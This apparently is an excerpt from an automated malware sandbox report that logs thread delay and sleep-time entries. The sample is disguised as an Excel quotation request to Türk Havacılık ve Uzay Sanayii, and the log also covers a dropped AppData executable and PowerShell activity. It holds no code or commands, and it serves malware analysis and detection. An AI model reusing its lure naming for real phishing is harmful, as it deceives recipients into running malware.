                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596575Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596469Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596250Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596030Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595922Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595812Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595594Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595484Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595375Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595265Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595042Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 594922Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 594812Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599890
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599773
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599671
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599562
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599453
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599343
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599231
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599125
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599015
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598903
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598797
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598687
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598576
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598468
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598359
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598250
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598140
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598031
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597922
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597812
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597703
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597593
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597484
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597375
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597265
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597156
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597047
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596937
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596822
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596718
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596609
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596491
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596346
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596218
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596108
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595997
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595890
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595781
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595671
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595562
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595453
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595343
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595234
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595125
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595015
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 594906
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 594797
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 594687
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 594578
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeWindow / User API: threadDelayed 1825Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeWindow / User API: threadDelayed 614Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6929Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 410Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7939Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1485Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeWindow / User API: threadDelayed 1627Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeWindow / User API: threadDelayed 941Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeWindow / User API: threadDelayed 2117Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeWindow / User API: threadDelayed 7730Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeWindow / User API: threadDelayed 8332
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeWindow / User API: threadDelayed 1526
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -239883s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -239765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -239651s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -239546s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -239435s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -239328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -239219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -239109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -239000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -238883s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -238688s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -238463s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -238156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -237989s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -237859s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324Thread sleep time: -237664s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4088Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1680Thread sleep count: 6929 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3872Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5740Thread sleep count: 410 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6256Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5328Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 764Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -239812s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -239702s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -239589s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -239469s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -239360s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -239247s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -239137s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -238992s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -238504s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -238384s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -238278s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -238170s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -238047s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212Thread sleep time: -237935s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7360Thread sleep count: 2117 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7360Thread sleep count: 7730 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -599672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -599560s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -599453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -599344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -599219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -599109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -599000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -598891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -598781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -598672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -598562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -598453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -598344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -598234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -598125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -598015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -597906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -597797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -597687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -597578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -597465s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -597344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -597234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -597125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -597015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -596906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -596797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -596687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -596575s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -596469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -596359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -596250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -596140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -596030s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -595922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -595812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -595703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -595594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -595484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -595375s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -595265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -595156s >= -30000sJump to behavior
